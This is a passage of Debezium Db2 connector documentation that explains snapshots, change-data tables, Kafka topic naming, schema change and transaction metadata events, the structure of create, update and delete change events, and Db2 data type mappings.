To optimally configure and run a {prodname} Db2 connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and handles schema changes.

ifdef::product[]
Details are in the following topics:

* xref:how-debezium-db2-connectors-perform-database-snapshots[]
* xref:how-debezium-db2-connectors-read-change-data-tables[]
* xref:default-names-of-kafka-topics-that-receive-db2-change-event-records[]
* xref:about-the-debezium-db2-connector-schema-change-topic[]
* xref:debezium-db2-connector-generated-events-that-represent-transaction-boundaries[]

endif::product[]

// Type: concept
// ModuleID: how-debezium-db2-connectors-perform-database-snapshots
// Title: How {prodname} Db2 connectors perform database snapshots
[[db2-snapshots]]
=== Snapshots

Db2's replication feature is not designed to store the complete history of database changes. Consequently, when a {prodname} Db2 connector connects to a database for the first time, it takes a consistent snapshot of tables that are in capture mode and streams this state to Kafka. This establishes the baseline for table content.

By default, when a Db2 connector performs a snapshot, it does the following:

. Determines which tables are in capture mode, and thus must be included in the snapshot. By default, all non-system tables are in capture mode. Connector configuration properties, such as `table.exclude.list` and `table.include.list`, let you specify which tables should be in capture mode.
. Obtains a lock on each of the tables in capture mode. This ensures that no schema changes can occur in those tables during the snapshot.
The level of the lock is determined by the `snapshot.isolation.mode` connector configuration property.
. Reads the highest (most recent) LSN position in the server's transaction log.
. Captures the schema of all tables that are in capture mode. The connector persists this information in its internal database history topic.
. Optionally, releases the locks obtained in step 2. Typically, these locks are held for only a short time.
. At the LSN position read in step 3, the connector scans the capture mode tables as well as their schemas. During the scan, the connector:
.. 
Confirms that the table was created before the start of the snapshot. If it was not, the snapshot skips that table. After the snapshot is complete, and the connector starts emitting change events, the connector produces change events for any tables that were created during the snapshot.\n.. Produces a _read_ event for each row in each table that is in capture mode. All _read_ events contain the same LSN position, which is the LSN position that was obtained in step 3.\n.. Emits each _read_ event to the Kafka topic that has the same name as the table.\n. Records the successful completion of the snapshot in the connector offsets.\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} Db2 connectors read change-data tables\n[id=\"how-debezium-db2-connectors-read-change-data-tables\"]\n=== Change-data tables\n\nAfter a complete snapshot, when a {prodname} Db2 connector starts for the first time, the connector identifies the change-data table for each source table that is in capture mode. The connector does the following for each change-data table:\n\n. Reads change events that were created between the last stored, highest LSN and the current, highest LSN.\n. Orders the change events according to the commit LSN and the change LSN for each event. This ensures that the connector emits the change events in the order in which the table changes occurred.\n. Passes commit and change LSNs as offsets to Kafka Connect.\n. Stores the highest LSN that the connector passed to Kafka Connect.\n\nAfter a restart, the connector resumes emitting change events from the offset (commit and change LSNs) where it left off. While the connector is running and emitting change events, if you remove a table from capture mode or add a table to capture mode, the connector detects this and modifies its behavior accordingly.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-db2-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} Db2 change event records\n[[db2-topic-names]]\n=== Topic names\n\nBy default, the Db2 connector writes change events for all insert, update, and delete operations on a single table to a single Kafka topic. The name of the Kafka topic has the following format:\n\n_databaseName_._schemaName_._tableName_\n\n_databaseName_:: The logical name of the connector as specified with the `database.server.name` connector configuration property.\n\n_schemaName_:: The name of the schema in which the operation occurred.\n\n_tableName_:: The name of the table in which the operation occurred.\n\nFor example, consider a Db2 installation with the `mydatabase` database, which contains four tables: `PRODUCTS`, `PRODUCTS_ON_HAND`, `CUSTOMERS`, and `ORDERS` that are in the `MYSCHEMA` schema. The connector would emit events to these four Kafka topics:\n\n* `mydatabase.MYSCHEMA.PRODUCTS`\n* `mydatabase.MYSCHEMA.PRODUCTS_ON_HAND`\n* `mydatabase.MYSCHEMA.CUSTOMERS`\n* `mydatabase.MYSCHEMA.ORDERS`\n\nTo configure a Db2 connector to emit change events to differently-named Kafka topics, see the documentation for the {link-prefix}:{link-topic-routing}#topic-routing[topic routing transformation].\n\n\/\/ Type: concept\n\/\/ Title: About the {prodname} Db2 connector schema change topic\n[id=\"about-the-debezium-db2-connector-schema-change-topic\"]\n=== Schema change topic\n\nFor a table that is in capture mode, the {prodname} Db2 connector stores the history of schema changes to that table in a database history topic. 
This topic reflects an internal connector state and you should not use it. If your application needs to track schema changes, there is a public schema change topic. The name of the schema change topic is the same as the logical server name specified in the connector configuration.\n\n[WARNING]\n====\nThe format of messages that a connector emits to its schema change topic is in an incubating state and can change without notice.\n====\n\n{prodname} emits a message to the schema change topic when:\n\n* A new table goes into capture mode.\n* A table is removed from capture mode.\n* During a {link-prefix}:{link-db2-connector}#db2-schema-evolution[database schema update], there is a change in the schema for a table that is in capture mode.\n\nA message to the schema change topic contains a logical representation of the table schema, for example:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n ...\n },\n \"payload\": {\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"db2\",\n \"ts_ms\": 1588252618953,\n \"snapshot\": \"true\",\n \"db\": \"testdb\",\n \"schema\": \"DB2INST1\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": null,\n \"commit_lsn\": \"00000025:00000d98:00a2\",\n \"event_serial_no\": null\n },\n \"databaseName\": \"TESTDB\", \/\/ <1>\n \"schemaName\": \"DB2INST1\",\n \"ddl\": null, \/\/ <2>\n \"tableChanges\": [ \/\/ <3>\n {\n \"type\": \"CREATE\", \/\/ <4>\n \"id\": \"\\\"DB2INST1\\\".\\\"CUSTOMERS\\\"\", \/\/ <5>\n \"table\": { \/\/ <6>\n \"defaultCharsetName\": null,\n \"primaryKeyColumnNames\": [ \/\/ <7>\n \"ID\"\n ],\n \"columns\": [ \/\/ <8>\n {\n \"name\": \"ID\",\n \"jdbcType\": 4,\n \"nativeType\": null,\n \"typeName\": \"int identity\",\n \"typeExpression\": \"int identity\",\n \"charsetName\": null,\n \"length\": 10,\n \"scale\": 0,\n \"position\": 1,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"FIRST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 2,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"LAST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 3,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"EMAIL\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 4,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n }\n ]\n }\n }\n ]\n }\n}\n----\n\n.Descriptions of fields in messages emitted to the schema change topic\n[cols=\"1,3,6\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`databaseName` +\n`schemaName`\n|Identifies the database and the schema that contain the change.\n\n|2\n|`ddl`\n|Always `null` for the Db2 connector. For other connectors, this field contains the DDL responsible for the schema change. This DDL is not available to Db2 connectors.\n\n|3\n|`tableChanges`\n|An array of one or more items that contain the schema changes generated by a DDL command.\n\n|4\n|`type`\na|Describes the kind of change. 
The value is one of the following:

* `CREATE` - table created
* `ALTER` - table modified
* `DROP` - table deleted

|5
|`id`
|Full identifier of the table that was created, altered, or dropped.

|6
|`table`
|Represents table metadata after the applied change.

|7
|`primaryKeyColumnNames`
|List of columns that compose the table's primary key.

|8
|`columns`
|Metadata for each column in the changed table.

|===

In messages to the schema change topic, the key is the name of the database that contains the schema change. In the following example, the `payload` field contains the key:

[source,json,indent=0,subs="+attributes"]
----
{
  "schema": {
    "type": "struct",
    "fields": [
      {
        "type": "string",
        "optional": false,
        "field": "databaseName"
      }
    ],
    "optional": false,
    "name": "io.debezium.connector.db2.SchemaChangeKey"
  },
  "payload": {
    "databaseName": "TESTDB"
  }
}
----

// Type: concept
// ModuleID: debezium-db2-connector-generated-events-that-represent-transaction-boundaries
// Title: {prodname} Db2 connector-generated events that represent transaction boundaries
[[db2-transaction-metadata]]
=== Transaction metadata

{prodname} can generate events that represent transaction boundaries and that enrich change data event messages. For every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:

* `status` - `BEGIN` or `END`
* `id` - string representation of unique transaction identifier
* `event_count` (for `END` events) - total number of events emitted by the transaction
* `data_collections` (for `END` events) - an array of pairs of `data_collection` and `event_count` that provides the number of events emitted by changes originating from the given data collection

.Example

[source,json,indent=0,subs="+attributes"]
----
{
  "status": "BEGIN",
  "id": "00000025:00000d08:0025",
  "event_count": null,
  "data_collections": null
}

{
  "status": "END",
  "id": "00000025:00000d08:0025",
  "event_count": 2,
  "data_collections": [
    {
      "data_collection": "testDB.dbo.tablea",
      "event_count": 1
    },
    {
      "data_collection": "testDB.dbo.tableb",
      "event_count": 1
    }
  ]
}
----

The connector emits transaction events to the `_database.server.name_.transaction` topic.

.Data change event enrichment

When transaction metadata is enabled, the connector enriches the change event `Envelope` with a new `transaction` field.
This field provides information about every event in the form of a composite of fields:

* `id` - string representation of unique transaction identifier
* `total_order` - absolute position of the event among all events generated by the transaction
* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction

Following is an example of a message:

[source,json,indent=0,subs="+attributes"]
----
{
  "before": null,
  "after": {
    "pk": "2",
    "aa": "1"
  },
  "source": {
...
  },
  "op": "c",
  "ts_ms": "1580390884335",
  "transaction": {
    "id": "00000025:00000d08:0025",
    "total_order": "1",
    "data_collection_order": "1"
  }
}
----
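Transaction metadata events are not emitted unless you enable them in the connector configuration. A minimal sketch of the relevant setting, assuming the `provide.transaction.metadata` option that current {prodname} versions use for this purpose; verify the option name in the connector property reference for your version:

[source,json]
----
{
  "provide.transaction.metadata": "true"
}
----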
// Type: assembly
// ModuleID: descriptions-of-debezium-db2-connector-data-change-events
// Title: Descriptions of {prodname} Db2 connector data change events
[[db2-events]]
== Data change events

The {prodname} Db2 connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.

{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.

The following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:

[source,json,indent=0]
----
{
 "schema": { // <1>
   ...
  },
 "payload": { // <2>
...
 },
 "schema": { // <3>
   ...
  },
 "payload": { // <4>
...
 }
}
----

.Overview of change event basic content
[cols="1,2,7",options="header"]
|===
|Item |Field name |Description

|1
|`schema`
|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +
 +
It is possible to override the table's primary key by setting the {link-prefix}:{link-db2-connector}#db2-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.

|2
|`payload`
|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.

|3
|`schema`
|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.

|4
|`payload`
|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.

|===
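For example, to base the event key on a column other than the primary key, you can set `message.key.columns` to a list of fully-qualified table names with the columns to use. A minimal sketch that uses the hypothetical `MYSCHEMA.CUSTOMERS` table from the examples that follow; check the connector property reference for the exact syntax that your version supports:

[source,json]
----
{
  "message.key.columns": "MYSCHEMA.CUSTOMERS:EMAIL"
}
----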
By default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-db2-connector}#db2-topic-names[topic names].

[WARNING]
====
The {prodname} Db2 connector ensures that all Kafka Connect schema names adhere to the link:http://avro.apache.org/docs/current/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \_. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \_. If there is an invalid character, it is replaced with an underscore character.

This can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.

Also, Db2 names for databases, schemas, and tables can be case sensitive. This means that the connector could emit event records for more than one table to the same Kafka topic.
====

ifdef::product[]
Details are in the following topics:

* xref:about-keys-in-debezium-db2-change-events[]
* xref:about-values-in-debezium-db2-change-events[]

endif::product[]

// Type: concept
// ModuleID: about-keys-in-debezium-db2-change-events
// Title: About keys in {prodname} Db2 change events
[[db2-change-event-keys]]
=== Change event keys

A change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.

Consider the following `customers` table, which is followed by an example of a change event key for this table.

.Example table
[source,sql,indent=0]
----
CREATE TABLE customers (
 ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,
 FIRST_NAME VARCHAR(255) NOT NULL,
 LAST_NAME VARCHAR(255) NOT NULL,
 EMAIL VARCHAR(255) NOT NULL UNIQUE
);
----

.Example change event key
Every change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:

[source,json,indent=0]
----
{
    "schema": { // <1>
        "type": "struct",
        "fields": [ // <2>
            {
                "type": "int32",
                "optional": false,
                "field": "ID"
            }
        ],
        "optional": false, // <3>
        "name": "mydatabase.MYSCHEMA.CUSTOMERS.Key" // <4>
    },
    "payload": { // <5>
        "ID": 1004
    }
}
----

.Description of change event key
[cols="1,2,7",options="header"]
|===
|Item |Field name |Description

|1
|`schema`
|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.

|2
|`fields`
|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.

|3
|`optional`
|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.

|4
|`mydatabase.MYSCHEMA.CUSTOMERS.Key`
a|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: +

* `mydatabase` is the name of the connector that generated this event. +
* `MYSCHEMA` is the database schema that contains the table that was changed. 
+
* `CUSTOMERS` is the table that was updated.

|5
|`payload`
|Contains the key for the row for which this change event was generated. In this example, the key contains a single `ID` field whose value is `1004`.

|===

////
[NOTE]
====
Although the `column.exclude.list` connector configuration property allows you to omit columns from event values, all columns in a primary or unique key are always included in the event's key.
====

[WARNING]
====
If the table does not have a primary or unique key, then the change event's key is null. The rows in a table without a primary or unique key constraint cannot be uniquely identified.
====
////

// Type: concept
// ModuleID: about-values-in-debezium-db2-change-events
// Title: About values in {prodname} Db2 change events
[[db2-change-event-values]]
=== Change event values

The value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update, or delete data all have a value payload with an envelope structure.

Consider the same sample table that was used to show an example of a change event key:

.Example table
[source,sql,indent=0]
----
CREATE TABLE customers (
 ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,
 FIRST_NAME VARCHAR(255) NOT NULL,
 LAST_NAME VARCHAR(255) NOT NULL,
 EMAIL VARCHAR(255) NOT NULL UNIQUE
);
----

The event value portion of every change event for the `customers` table specifies the same schema. The event value's payload varies according to the event type:

* <<db2-create-events,_create_ events>>
* <<db2-update-events,_update_ events>>
* <<db2-delete-events,_delete_ events>>

[[db2-create-events]]
=== _create_ events

The following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:

[source,json,indent=0,subs="+attributes"]
----
{
  "schema": { // <1>
    "type": "struct",
    "fields": [
      {
        "type": "struct",
        "fields": [
          {
            "type": "int32",
            "optional": false,
            "field": "ID"
          },
          {
            "type": "string",
            "optional": false,
            "field": "FIRST_NAME"
          },
          {
            "type": "string",
            "optional": false,
            "field": "LAST_NAME"
          },
          {
            "type": "string",
            "optional": false,
            "field": "EMAIL"
          }
        ],
        "optional": true,
        "name": "mydatabase.MYSCHEMA.CUSTOMERS.Value", // <2>
        "field": "before"
      },
      {
        "type": "struct",
        "fields": [
          {
            "type": "int32",
            "optional": false,
            "field": "ID"
          },
          {
            "type": "string",
            "optional": false,
            "field": "FIRST_NAME"
          },
          {
            "type": "string",
            "optional": false,
            "field": "LAST_NAME"
          },
          {
            "type": "string",
            "optional": false,
            "field": "EMAIL"
          }
        ],
        "optional": true,
        "name": "mydatabase.MYSCHEMA.CUSTOMERS.Value",
        "field": "after"
      },
      {
        "type": "struct",
        "fields": [
          {
            "type": "string",
            "optional": false,
            "field": "version"
          },
          {
            "type": "string",
            "optional": false,
            "field": "connector"
          },
          {
            "type": "string",
            "optional": false,
            "field": "name"
          },
          {
            "type": "int64",
            "optional": false,
            "field": "ts_ms"
          },
          {
            "type": "boolean",
            "optional": true,
            "default": false,
            "field": "snapshot"
          },
          {
            "type": "string",
            "optional": false,
            "field": "db"
          },
          {
            "type": "string",
            "optional": false,
            "field": "schema"
          },
          {
            "type": "string",
            "optional": false,
            "field": "table"
          },
          {
            "type": "string",
            "optional": true,
            "field": "change_lsn"
          },
          {
            "type": "string",
            "optional": true,
            "field": "commit_lsn"
          }
        ],
        "optional": false,
        "name": "io.debezium.connector.db2.Source", // <3>
        "field": "source"
      },
      {
        "type": "string",
        "optional": false,
        "field": "op"
      },
      {
        "type": "int64",
        "optional": true,
        "field": "ts_ms"
      }
    ],
    "optional": false,
    "name": "mydatabase.MYSCHEMA.CUSTOMERS.Envelope" // <4>
  },
  "payload": { // <5>
    "before": null, // <6>
    "after": { // <7>
      "ID": 1005,
      "FIRST_NAME": "john",
      "LAST_NAME": "doe",
      "EMAIL": "john.doe@example.org"
    },
    "source": { // <8>
      "version": "{debezium-version}",
      "connector": "db2",
      "name": "myconnector",
      "ts_ms": 1559729468470,
      "snapshot": false,
      "db": "mydatabase",
      "schema": "MYSCHEMA",
      "table": "CUSTOMERS",
      "change_lsn": "00000027:00000758:0003",
      "commit_lsn": "00000027:00000758:0005"
    },
    "op": "c", // <9>
    "ts_ms": 1559729471739 // <10>
  }
}
----

.Descriptions of _create_ event value fields
[cols="1,2,7",options="header"]
|===
|Item |Field name |Description

|1
|`schema`
|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.

|2
|`name`
a|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +
 +
`mydatabase.MYSCHEMA.CUSTOMERS.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. The connector uses this schema for all rows in the `MYSCHEMA.CUSTOMERS` table. +
 +
Names of schemas for `before` and `after` fields are of the form `_logicalName_._schemaName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.

|3
|`name`
a|`io.debezium.connector.db2.Source` is the schema for the payload's `source` field. This schema is specific to the Db2 connector. The connector uses it for all events that it generates.

|4
|`name`
a|`mydatabase.MYSCHEMA.CUSTOMERS.Envelope` is the schema for the overall structure of the payload, where `mydatabase` is the database, `MYSCHEMA` is the schema, and `CUSTOMERS` is the table.

|5
|`payload`
|The value's actual data. This is the information that the change event is providing. +
 +
It may appear that JSON representations of events are much larger than the rows they describe. This is because a JSON representation must include the schema portion and the payload portion of the message.
However, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.

|6
|`before`
|An optional field that specifies the state of the row before the event occurred. 
When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.

|7
|`after`
|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `ID`, `FIRST_NAME`, `LAST_NAME`, and `EMAIL` columns.

|8
|`source`
a|Mandatory field that describes the source metadata for the event. The `source` structure shows Db2 information about this change, which provides traceability. It also has information you can use to compare to other events in the same topic or in other topics to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:

* {prodname} version
* Connector type and name
* Timestamp for when the change was made in the database
* Whether the event is part of an ongoing snapshot
* Name of the database, schema, and table that contain the new row
* Change LSN
* Commit LSN (omitted if this event is part of a snapshot)

|9
|`op`
a|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:

* `c` = create
* `u` = update
* `d` = delete
* `r` = read (applies only to snapshots)

|10
|`ts_ms`
a|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +
 +
In the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.

|===

[[db2-update-events]]
=== _update_ events

The value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the _update_ event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:

[source,json,indent=0,subs="+attributes"]
----
{
  "schema": { ... },
  "payload": {
    "before": { // <1>
      "ID": 1005,
      "FIRST_NAME": "john",
      "LAST_NAME": "doe",
      "EMAIL": "john.doe@example.org"
    },
    "after": { // <2>
      "ID": 1005,
      "FIRST_NAME": "john",
      "LAST_NAME": "doe",
      "EMAIL": "noreply@example.org"
    },
    "source": { // <3>
      "version": "{debezium-version}",
      "connector": "db2",
      "name": "myconnector",
      "ts_ms": 1559729995937,
      "snapshot": false,
      "db": "mydatabase",
      "schema": "MYSCHEMA",
      "table": "CUSTOMERS",
      "change_lsn": "00000027:00000ac0:0002",
      "commit_lsn": "00000027:00000ac0:0007"
    },
    "op": "u", // <4>
    "ts_ms": 1559729998706 // <5>
  }
}
----

.Descriptions of _update_ event value fields
[cols="1,2,7",options="header"]
|===
|Item |Field name |Description

|1
|`before`
|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. 
In this example, note that the `EMAIL` value is `john.doe@example.org`.

|2
|`after`
|An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `EMAIL` value is now `noreply@example.org`.

|3
|`source`
a|Mandatory field that describes the source metadata for the event. The `source` field structure contains the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event has different LSNs. You can use this information to compare this event to other events to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:

* {prodname} version
* Connector type and name
* Timestamp for when the change was made in the database
* Whether the event is part of an ongoing snapshot
* Name of the database, schema, and table that contain the new row
* Change LSN
* Commit LSN (omitted if this event is part of a snapshot)

|4
|`op`
a|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.

|5
|`ts_ms`
a|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +
 +
In the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.

|===

[NOTE]
====
Updating the columns for a row's primary/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-db2-connector}#db2-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row.
====

[[db2-delete-events]]
=== _delete_ events

The value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The event value `payload` in a _delete_ event for the sample `customers` table looks like this:

[source,json,indent=0,subs="+attributes"]
----
{
  "schema": { ... },
  "payload": {
    "before": { // <1>
      "ID": 1005,
      "FIRST_NAME": "john",
      "LAST_NAME": "doe",
      "EMAIL": "noreply@example.org"
    },
    "after": null, // <2>
    "source": { // <3>
      "version": "{debezium-version}",
      "connector": "db2",
      "name": "myconnector",
      "ts_ms": 1559730445243,
      "snapshot": false,
      "db": "mydatabase",
      "schema": "MYSCHEMA",
      "table": "CUSTOMERS",
      "change_lsn": "00000027:00000db0:0005",
      "commit_lsn": "00000027:00000db0:0007"
    },
    "op": "d", // <4>
    "ts_ms": 1559730450205 // <5>
  }
}
----

.Descriptions of _delete_ event value fields
[cols="1,2,7",options="header"]
|===
|Item |Field name |Description

|1
|`before`
|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.

|2
|`after`
|Optional field that specifies the state of the row after the event occurred. 
In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and LSN field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nDb2 connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[[db2-tombstone-events]]\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s Db2 connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-db2-connectors-map-data-types\n\/\/ Title: How {prodname} Db2 connectors map data types\n[[db2-data-types]]\n== Data type mappings\n\nDb2's data types are described in https:\/\/www.ibm.com\/support\/knowledgecenter\/en\/SSEPGG_11.5.0\/com.ibm.db2.luw.sql.ref.doc\/doc\/r0008483.html[Db2 SQL Data Types].\n\nThe Db2 connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the Db2 data type of the column. 
This section describes these mappings.

ifdef::product[]
Details are in the following sections:

* xref:db2-basic-types[]
* xref:db2-temporal-types[]
* xref:db2-timestamp-types[]
* xref:db2-decimal-types[]

endif::product[]

[id="db2-basic-types"]
=== Basic types

The following table describes how the connector maps each of the Db2 data types to a _literal type_ and a _semantic type_ in event fields.

* _literal type_ describes how the value is represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.

* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.

.Mappings for Db2 basic data types
[cols="25%a,20%a,55%a",options="header"]
|===
|Db2 data type
|Literal type (schema type)
|Semantic type (schema name) and Notes

|`BOOLEAN`
|`BOOLEAN`
|Only snapshots can be taken from tables with BOOLEAN type columns. Currently, SQL Replication on Db2 does not support BOOLEAN, so {prodname} cannot perform CDC on those tables. Consider using a different type.

|`BIGINT`
|`INT64`
|n/a

|`BINARY`
|`BYTES`
|n/a

|`BLOB`
|`BYTES`
|n/a

|`CHAR[(N)]`
|`STRING`
|n/a

|`CLOB`
|`STRING`
|n/a

|`DATE`
|`INT32`
|`io.debezium.time.Date` +
 +
String representation of a timestamp without timezone information

|`DECFLOAT`
|`BYTES`
|`org.apache.kafka.connect.data.Decimal`

|`DECIMAL`
|`BYTES`
|`org.apache.kafka.connect.data.Decimal`

|`DBCLOB`
|`STRING`
|n/a

|`DOUBLE`
|`FLOAT64`
|n/a

|`INTEGER`
|`INT32`
|n/a

|`REAL`
|`FLOAT32`
|n/a

|`SMALLINT`
|`INT16`
|n/a

|`TIME`
|`INT32`
|`io.debezium.time.Time` +
 +
String representation of a time without timezone information

|`TIMESTAMP`
|`INT64`
|`io.debezium.time.MicroTimestamp` +
 +
String representation of a timestamp without timezone information

|`VARBINARY`
|`BYTES`
|n/a

|`VARCHAR[(N)]`
|`STRING`
|n/a

|`VARGRAPHIC`
|`STRING`
|n/a

|`XML`
|`STRING`
|`io.debezium.data.Xml` +
 +
String representation of an XML document
|===

If present, a column's default value is propagated to the corresponding field's Kafka Connect schema. Change events contain the field's default value unless an explicit column value was given. Consequently, there is rarely a need to obtain the default value from the schema.
ifdef::community[]
Passing the default value helps satisfy compatibility rules when {link-prefix}:{link-avro-serialization}[using Avro] as the serialization format together with the Confluent schema registry.
endif::community[]

[[db2-temporal-types]]
=== Temporal types

